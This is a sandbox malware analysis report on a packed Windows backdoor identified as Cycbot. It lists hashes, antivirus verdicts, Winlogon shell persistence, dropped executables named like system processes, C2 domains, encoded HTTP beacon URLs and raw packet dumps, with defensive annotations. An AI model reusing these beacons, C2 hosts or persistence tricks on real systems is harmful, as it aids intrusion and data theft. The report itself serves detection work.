Analysis Date: 2014-10-12 23:19:26
MD5: c779de34341460a67c5aae67a5f4d6ec
SHA1: dbff12560e9a6cb508f9d9c321fca81dc6162161

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 2ab539af811b1ee3e16419a15f8763c9 sha1: d2d56a59ce292cc80fcf68c143edb62f18177c8d size: 134144
Section .rdata md5: fd524ed2bb7adb30c86282558ac2cc2d sha1: c3927baed7cde8c8c21bdb8421171f55d63eab1f size: 4096
Section .data  md5: 44df41a719748fffac03b98a0d825022 sha1: 1a30d11545b65a7cfe531b85e3bc7fdfd9002df5 size: 45056
Section .crt   md5: 65298f3d281ee69e8dbe8149a1f8c6df sha1: 81d22f2b2e8d965d71b8ad58630d101f509d2919 size: 512
Timestamp: 2005-11-03 04:38:18 (presumably the PE header compile timestamp; this field is written by whoever built the file and is trivially forged, so the nine-year gap to the analysis date says nothing reliable about when the sample was actually built)
Version: PrivateBuild: 1509
PEhash: 4d197ff4ce634c11967a9edd5ce621fa6d9e055b
IMPhash: ca2a7ba1e05628a65fc991340c698ebb (import-table hash; for a packed sample, which the Kryptik/Crypt.XPACK/Pakes verdicts below suggest this is, it clusters on the packer stub rather than on the payload)
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Trojan.Heur.KS.1
AV CA (E-Trust Ino): Win32/Gbot.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-539638
AV Dr. Web: Trojan.Siggen2.15624
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.JWH
AV Fortinet: W32/Kryptik.K!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Cryptic.CAM
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Pakes.oli
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.h
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Norman: winpe/Cycbot.BH
AV Rising: Trojan.Win32.Generic.1273EA83
AV Sophos: Mal/FakeAV-IS
AV Symantec: Trojan.Gen
AV Trend Micro: BKDR_CYCBOT.SMIB
AV VirusBlokAda (vba32): Trojan.Pakes
AV Yara APT: no_virus
AV Zillya!: Trojan.Pakes.Win32.9399
Summary: 30 of the 32 engines flag the file. Where a family is named it is consistently the Cycbot backdoor (CAT, Ikarus, Microsoft, Norman, Trend Micro), with the Gbot/Goolbot/Cybota labels from CA, Authentium, Frisk and avast commonly used as aliases for the same family; the remaining verdicts (Kryptik, Crypt.XPACK, Pakes, Cryptic, Heur) are generic packer/crypter or heuristic detections. Treat the runtime behaviour below, not these labels, as the authoritative description of what the sample does.

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
The Winlogon\Shell change is the persistence mechanism: programs listed in this value are started as the user's shell at logon, so the dropped dwm.exe is launched alongside explorer.exe every time this user logs on. Note the name masquerade — dwm.exe (like the csrss.exe and conhost.exe dropped below) is a legitimate Windows process name, but here it lives under the user profile rather than System32, which is a simple, reliable hunting check. ProxyEnable=1 switches on the Internet Settings proxy flag; the report shows no ProxyServer value being written, so if a proxy target is configured it is not visible here.
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\csrss.exe-style entry — see note below
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Note: the two "Creates Process" entries for C:\malware.exe run the image path, command line and working directory together (the `%` appears to be the sandbox's field separator); the second spawns C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe with that directory as working directory. The index.dat files and the WinINet cache-lock mutexes below are consistent with the sample using the WinINet HTTP stack; \Device\Afd\Endpoint is a raw Winsock socket handle. The distinctive file artefacts are the three executables dropped under user-writable paths (dwm.exe, csrss.exe, conhost.exe) and the random-looking 75DE.FFC under Application Data.
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: zoneij.com
Winsock DNS: 136136.com
Winsock DNS: zonedg.com
Note: WininetConnectionMutex and the three `c:!...!` mutexes are the names WinINet uses to lock its cache directories and will appear in any process that uses WinINet, so they are not useful indicators. The four GUID-named mutexes are the candidates for host-based indicators, once confirmed against a clean baseline. The lookup of 127.0.0.1 is recorded but its purpose is not shown by the report.

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: 136136.com
Type: A
61.129.70.87
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonetf.com
Type: A
141.8.225.80
DNS: zoneij.com
Type: A
(no answer recorded for zoneij.com; note that zonedg.com and zonetf.com resolve to the same host, 141.8.225.80, so both of the flows to that address below belong to the same server)
HTTP GEThttp://136136.com/LB5000/CGI-BIN/s.cgi?tq=gP4aKydkv3VGGBNcIs0yiHq6Qq7dokGPa1em2%2Bwsu1mzedMoJ2yrmwRebmx8IJJtHapXydV2mKyvHFnhFQ8%2BdAFZitF%2F9uNLzFk1mWrrfeBjKhlvCkaSPdQStoAOP7YSkcYpZS8yfZb2uZP5KZWPFw4xF9qQHYzpkJNaT3O0wjIR8WtokX3eGiGgxWLusum67yLxduqZZkPc6%2BHjZGEnaZCE5ZrQHj4qvBaW%2BgYIjE5%2By6kTvPGRK%2F0ImwScegzjKcBw%2B0gpUrOgszNgwYFFd7kR%2FCH98OdNTtJnmRJl2BWpvPLxkKIrb0ZKM3TZmT%2FPTb7k9hckRvYCD4kuSNZqNUcZW3%2BZmZhSROdPLLhNrbeSwUgACK%2Bq6C1mjpQkCGL%2BVu3QZ3gJOvuC%2BNJP8nAUqmsa%2B3QjFEE6ojTNuNh%2FCRR62JlCJOnQloIdsII906VuQV3xS1rYNrPhgy%2BCwl7F0wTW3F%2BbZQHDXssiNXI85jvfCva35WEcemTumU7k7tghFQ6Iob%2BSOj7emoBItIJ8syRN
User-Agent: iamx/3.11 (a non-browser User-Agent string shared by both GET requests — a distinctive, low-false-positive match for proxy or IDS rules; the POST below instead presents a generic MSIE 6.0 string)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvEq3ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) — the POST is sent with Content-Length: 0 (see the raw pcap), so its entire payload travels in the URL-encoded, base64-looking `tq=` query parameter, exactly as with the two GETs
Flow TCP: 192.168.1.1:1031 ➝ 61.129.70.87:80
Flow TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flow TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
All observed traffic is plaintext HTTP on TCP/80 to two hosts; there is no flow to zoneij.com, consistent with its DNS query receiving no answer.

Raw Pcap
Note on the third dump below: it begins with the POST to zonetf.com, whose headers end (Content-Length: 0) at offset 0x14c. What follows — an HTML fragment advertising Microsoft-IIS/7.0, then bytes that are identical, at the same offsets, to the tail of the first GET request — looks like a reused capture buffer rather than additional request payload, so do not treat that trailing data as part of the POST.
0x00000000 (00000)   47455420 2f4c4235 3030302f 4347492d   GET /LB5000/CGI-
0x00000010 (00016)   42494e2f 732e6367 693f7471 3d675034   BIN/s.cgi?tq=gP4
0x00000020 (00032)   614b7964 6b763356 4747424e 63497330   aKydkv3VGGBNcIs0
0x00000030 (00048)   79694871 36517137 646f6b47 50613165   yiHq6Qq7dokGPa1e
0x00000040 (00064)   6d322532 42777375 316d7a65 644d6f4a   m2%2Bwsu1mzedMoJ
0x00000050 (00080)   3279726d 77526562 6d783849 4a4a7448   2yrmwRebmx8IJJtH
0x00000060 (00096)   61705879 6456326d 4b797648 466e6846   apXydV2mKyvHFnhF
0x00000070 (00112)   51382532 42644146 5a697446 25324639   Q8%2BdAFZitF%2F9
0x00000080 (00128)   754e4c7a 466b316d 57727266 65426a4b   uNLzFk1mWrrfeBjK
0x00000090 (00144)   686c7643 6b615350 64515374 6f414f50   hlvCkaSPdQStoAOP
0x000000a0 (00160)   3759536b 6359705a 53387966 5a623275   7YSkcYpZS8yfZb2u
0x000000b0 (00176)   5a50354b 5a575046 77347846 39715148   ZP5KZWPFw4xF9qQH
0x000000c0 (00192)   597a706b 4a4e6154 334f3077 6a495238   YzpkJNaT3O0wjIR8
0x000000d0 (00208)   57746f6b 58336547 69476778 574c7573   WtokX3eGiGgxWLus
0x000000e0 (00224)   756d3637 794c7864 75715a5a 6b506336   um67yLxduqZZkPc6
0x000000f0 (00240)   25324248 6a5a4745 6e615a43 45355a72   %2BHjZGEnaZCE5Zr
0x00000100 (00256)   51486a34 71764261 57253242 6759496a   QHj4qvBaW%2BgYIj
0x00000110 (00272)   45352532 4279366b 54765047 524b2532   E5%2By6kTvPGRK%2
0x00000120 (00288)   4630496d 77536365 677a6a4b 63427725   F0ImwScegzjKcBw%
0x00000130 (00304)   32423067 7055724f 67737a4e 67775946   2B0gpUrOgszNgwYF
0x00000140 (00320)   4664376b 52253246 43483938 4f644e54   Fd7kR%2FCH98OdNT
0x00000150 (00336)   744a6e6d 524a6c32 42577076 504c786b   tJnmRJl2BWpvPLxk
0x00000160 (00352)   4b497262 305a4b4d 33545a6d 54253246   KIrb0ZKM3TZmT%2F
0x00000170 (00368)   50546237 6b396863 6b527659 4344346b   PTb7k9hckRvYCD4k
0x00000180 (00384)   75534e5a 714e5563 5a573325 32425a6d   uSNZqNUcZW3%2BZm
0x00000190 (00400)   5a685352 4f64504c 4c684e72 62655377   ZhSROdPLLhNrbeSw
0x000001a0 (00416)   55674143 4b253242 71364331 6d6a7051   UgACK%2Bq6C1mjpQ
0x000001b0 (00432)   6b43474c 25324256 7533515a 33674a4f   kCGL%2BVu3QZ3gJO
0x000001c0 (00448)   76754325 32424e4a 50386e41 55716d73   vuC%2BNJP8nAUqms
0x000001d0 (00464)   61253242 33516a46 4545366f 6a544e75   a%2B3QjFEE6ojTNu
0x000001e0 (00480)   4e682532 46435252 36324a6c 434a4f6e   Nh%2FCRR62JlCJOn
0x000001f0 (00496)   516c6f49 64734949 39303656 75515633   QloIdsII906VuQV3
0x00000200 (00512)   78533172 594e7250 68677925 32424377   xS1rYNrPhgy%2BCw
0x00000210 (00528)   6c374630 77545733 46253242 625a5148   l7F0wTW3F%2BbZQH
0x00000220 (00544)   44587373 694e5849 38356a76 66437661   DXssiNXI85jvfCva
0x00000230 (00560)   33355745 63656d54 756d5537 6b377467   35WEcemTumU7k7tg
0x00000240 (00576)   68465136 496f6225 3242534f 6a37656d   hFQ6Iob%2BSOj7em
0x00000250 (00592)   6f424974 494a3873 79524e20 48545450   oBItIJ8syRN HTTP
0x00000260 (00608)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000270 (00624)   3a20636c 6f73650d 0a486f73 743a2031   : close..Host: 1
0x00000280 (00640)   33363133 362e636f 6d0d0a41 63636570   36136.com..Accep
0x00000290 (00656)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000002a0 (00672)   6e743a20 69616d78 2f332e31 310d0a0d   nt: iamx/3.11...
0x000002b0 (00688)   0a                                    .

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427645 7133656a 62777667 53393137   fBvEq3ejbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a                       .11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a72792e   on: close....ry.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a4c 4c684e72 62655377   /html>.LLhNrbeSw
0x000001a0 (00416)   55674143 4b253242 71364331 6d6a7051   UgACK%2Bq6C1mjpQ
0x000001b0 (00432)   6b43474c 25324256 7533515a 33674a4f   kCGL%2BVu3QZ3gJO
0x000001c0 (00448)   76754325 32424e4a 50386e41 55716d73   vuC%2BNJP8nAUqms
0x000001d0 (00464)   61253242 33516a46 4545366f 6a544e75   a%2B3QjFEE6ojTNu
0x000001e0 (00480)   4e682532 46435252 36324a6c 434a4f6e   Nh%2FCRR62JlCJOn
0x000001f0 (00496)   516c6f49 64734949 39303656 75515633   QloIdsII906VuQV3
0x00000200 (00512)   78533172 594e7250 68677925 32424377   xS1rYNrPhgy%2BCw
0x00000210 (00528)   6c374630 77545733 46253242 625a5148   l7F0wTW3F%2BbZQH
0x00000220 (00544)   44587373 694e5849 38356a76 66437661   DXssiNXI85jvfCva
0x00000230 (00560)   33355745 63656d54 756d5537 6b377467   35WEcemTumU7k7tg
0x00000240 (00576)   68465136 496f6225 3242534f 6a37656d   hFQ6Iob%2BSOj7em
0x00000250 (00592)   6f424974 494a3873 79524e20 48545450   oBItIJ8syRN HTTP
0x00000260 (00608)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000270 (00624)   3a20636c 6f73650d 0a486f73 743a2031   : close..Host: 1
0x00000280 (00640)   33363133 362e636f 6d0d0a41 63636570   36136.com..Accep
0x00000290 (00656)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000002a0 (00672)   6e743a20 69616d78 2f332e31 310d0a0d   nt: iamx/3.11...
0x000002b0 (00688)   0a                                    .


Strings
Note: the readable strings are almost entirely import names of a dialog-style GUI application (CheckDlgButton, CreateDialogParamA, AlphaBlend, TransparentBlt, WinHelpA) plus resource and memory APIs (FindResourceA/LoadResource/LockResource, VirtualAlloc/VirtualProtect, LoadLibraryA/GetProcAddress) and registry write APIs (RegCreateKeyExA, RegSetValueExA, RegDeleteKeyA). No WinINet or WS2_32 import appears, yet the sample performs HTTP and Winsock activity at runtime, and several engines label it Kryptik/Crypt.XPACK/Pakes. Taken together this suggests a packed or crypted wrapper that resolves the real payload's imports at runtime; these strings most likely describe the loader, not the backdoor, and are a poor basis for a detection signature.
..
.
.
.J
.
040904b0
1509
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0hXgJi
16.Rbx
34MgNc
?3~SnT
4*dS4%
-;[4U`
:6A">rv
6IC*Dh
=[*7Hf
7U"phF~
_8o+DG
>" 9q~
ADVAPI32.dll
AlphaBlend
b0J3-7l
BA/'12
bEGRu5J
/]BJ||:s
*-BqNA
B**UT`
'-b,*wB8
CharNextA
CheckDlgButton
CloseHandle
CoCreateInstance
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CreateDialogParamA
CreateFontIndirectA
@.data
DeleteCriticalSection
DeleteObject
DestroyWindow
DisableThreadLibraryCalls
{!Dn1_f
D?Vsbps
E"Hr.V
[eN:-0
EnableWindow
EnterCriticalSection
EnumResourceNamesW
;(e]V6
ExitProcess
faZ#^Y
f"cF|{
F.hem@
FindResourceA
FlushFileBuffers
FlushInstructionCache
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
g[A]D2
GDI32.dll
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDialogBaseUnits
GetDlgItem
GetDlgItemTextA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemInfo
GetSystemTimeAsFileTime
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
gg:I}5
:g};sF
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
H!f},R
/-hh\<
hhlFre
hhLoad
];hlU%
*.hnl@
hP.hSq@
Htu(yp|
H-U76O7
*hxHl&
+^hx(Y
$I0=g_
iK*y{W
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
ioBd/[
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
IsDialogMessageA
IsDlgButtonChecked
IsWindow
[^JH}O
JRxx-K
KERNEL32.dll
kSURM`
-:k<u'
kZ7^]I
l8%#~D
LCMapStringA
LCMapStringW
LeaveCriticalSection
lM;%_g
LoadLibraryA
LoadLibraryExA
LoadResource
LockResource
|lo]Km
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lstrlenW
l^-[tU
***MmW
MoveWindow
MSIMG32.dll
MulDiv
MultiByteToWideChar
MY$/\*
M/*y60
:^m~'yc
NTqI	Z
N<}Z4(
O}J>u]
ojx	ms/
ole32.dll
	O,,#M2
PathFindExtensionA
pIz53@
@@pJD9
q$5C p
qgj	}}
/*qrQy7u|
QueryPerformanceCounter
RaiseException
rc?Pv/
`.rdata
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegSetValueExA
ReleaseDC
RtlUnwind
^SC$$wO
SelectObject
SendMessageA
SetDlgItemTextA
SetFilePointer
SetHandleCount
SetHandleInformation
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SetWindowLongA
SHLWAPI.dll
ShowWindow
SizeofResource
S&NF;nf
Sngmrc
StringFromGUID2
TerminateProcess
!This program cannot be run in DOS mode.
ThlAll
T$HPRj
tk3mg;
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tmz7zU
TransmitCommChar
TransparentBlt
UnhandledExceptionFilter
UnregisterClassA
USER32.dll
U)]x<.
v^13Bk
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
vj@{->
vl9#;/
Vmm[vnN
VQOe89
/VU\kr
W5u94O:cO
WideCharToMultiByte
WinHelpA
Wixa^H
?W>j`((
WriteFile
:x2*>t
x>~6c{Z>8
$	-x_%8
#xQO"g
\;Xwz$
Y.h}|@
*YXwJ_=
z9/0A;
Z~B0'V
ZBD+^{
~ZEiMF
ZEv4iM
[.)zLj